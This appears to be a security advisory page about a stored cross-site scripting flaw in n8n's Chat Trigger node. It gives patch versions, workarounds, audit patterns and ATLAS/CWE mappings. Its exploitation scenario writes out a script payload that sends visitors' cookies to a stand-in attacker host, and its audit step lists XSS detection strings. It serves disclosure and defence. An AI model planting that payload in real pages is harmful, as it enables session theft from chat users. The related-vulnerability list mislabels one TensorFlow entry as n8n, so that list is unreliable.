Any n8n deployment running the Chat Trigger node (LangChain integration) with a public chat URL is actively exposing all visitors to stored XSS — a workflow editor with legitimate credentials can silently backdoor every user who opens the chat. Patch to n8n 1.123.27, 2.13.3, or 2.14.1 immediately. If patching is blocked, restrict workflow edit permissions to fully trusted accounts only and disable the Chat Trigger node via the NODES_EXCLUDE environment variable.
What is the risk?
CVSS 5.4 Medium understates operational risk in AI-native environments. The Scope:Changed indicator (S:C) signals cross-boundary impact — the attacker plants the payload in the workflow configuration but detonates it in every chat visitor's browser session. n8n Chat Trigger nodes typically front LLM-powered assistants with access to RAG backends, API credentials, and workflow execution context. Session token theft here translates directly to access to the AI agent's toolchain. Low attack complexity once an authorized workflow editor account is compromised or abused. No active exploitation reported; not in CISA KEV.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | < 1.123.27 | 1.123.27 |
Do you use n8n? You're affected.
How severe is it?
What is the attack surface?
What should I do?
6 steps-
PATCH
Upgrade to n8n 1.123.27 (v1 branch), 2.13.3, or 2.14.1 immediately — this is the only full remediation.
-
RESTRICT
If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC; audit current role assignments now.
-
DISABLE NODE
Set NODES_EXCLUDE=@n8n/n8n-nodes-langchain.chatTrigger in the environment to block Chat Trigger instantiation.
-
AUDIT
Grep existing workflow JSON exports for <script, javascript:, onerror, or base64 payloads in Custom CSS fields.
-
ROTATE
Invalidate all active chat session tokens after patching.
-
MONITOR
Alert on workflow save events that modify Chat Trigger CSS fields post-patch to detect residual or re-injected payloads.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-3c7f-5hgj-h279?
Any n8n deployment running the Chat Trigger node (LangChain integration) with a public chat URL is actively exposing all visitors to stored XSS — a workflow editor with legitimate credentials can silently backdoor every user who opens the chat. Patch to n8n 1.123.27, 2.13.3, or 2.14.1 immediately. If patching is blocked, restrict workflow edit permissions to fully trusted accounts only and disable the Chat Trigger node via the NODES_EXCLUDE environment variable.
Is GHSA-3c7f-5hgj-h279 actively exploited?
No confirmed active exploitation of GHSA-3c7f-5hgj-h279 has been reported, but organizations should still patch proactively.
How to fix GHSA-3c7f-5hgj-h279?
1. PATCH: Upgrade to n8n 1.123.27 (v1 branch), 2.13.3, or 2.14.1 immediately — this is the only full remediation. 2. RESTRICT: If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC; audit current role assignments now. 3. DISABLE NODE: Set NODES_EXCLUDE=@n8n/n8n-nodes-langchain.chatTrigger in the environment to block Chat Trigger instantiation. 4. AUDIT: Grep existing workflow JSON exports for <script, javascript:, onerror, or base64 payloads in Custom CSS fields. 5. ROTATE: Invalidate all active chat session tokens after patching. 6. MONITOR: Alert on workflow save events that modify Chat Trigger CSS fields post-patch to detect residual or re-injected payloads.
What systems are affected by GHSA-3c7f-5hgj-h279?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, workflow automation, LangChain integrations, public-facing chat interfaces, LLM API proxies.
What is the CVSS score for GHSA-3c7f-5hgj-h279?
GHSA-3c7f-5hgj-h279 has a CVSS v3.1 base score of 5.4 (MEDIUM).
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0011 User Execution AML.T0012 Valid Accounts AML.T0049 Exploit Public-Facing Application AML.T0053 AI Agent Tool Invocation AML.T0078 Drive-by Compromise AML.T0080 AI Agent Context Poisoning Compliance Controls Affected
What are the technical details?
Original Advisory
## Impact An authenticated user with permission to create or modify workflows could inject malicious JavaScript into the Custom CSS field of the Chat Trigger node. Due to a misconfiguration in the `sanitize-html` library, the sanitization could be bypassed, resulting in stored XSS on the public chat page. Any user visiting the chat URL would be affected. ## Patches The issue has been fixed in n8n versions 1.123.27, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability. ## Workarounds If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit workflow creation and editing permissions to fully trusted users only. - Disable the Chat Trigger node by adding `@n8n/n8n-nodes-langchain.chatTrigger` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Exploitation Scenario
A threat actor with legitimate (or compromised) workflow editor credentials opens an n8n workflow containing a Chat Trigger node and injects <script>fetch('https://c2.attacker.com/x?t='+document.cookie)</script> into the Custom CSS field. The sanitize-html misconfiguration fails to strip the tag. The workflow is saved and published — the payload now lives in the persistent workflow configuration. A customer service agent, external user, or automated integration that opens the public chat URL executes the script automatically, exfiltrating the session token to the attacker. The attacker replays the token to authenticate as that user, accesses the n8n instance or any downstream AI service the chat was proxying (LLM API, RAG knowledge base, CRM integration), and pivots further through the connected workflow toolchain without triggering additional alerts.
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N References
Timeline
Related Vulnerabilities
CVE-2026-33663 10.0 n8n: member role steals plaintext HTTP credentials
Same package: n8n CVE-2026-33660 10.0 TensorFlow: type confusion NPD in tensor conversion
Same package: n8n CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same package: n8n CVE-2026-27577 9.9 n8n: Code Injection enables RCE
Same package: n8n CVE-2026-27494 9.9 n8n: security flaw enables exploitation
Same package: n8n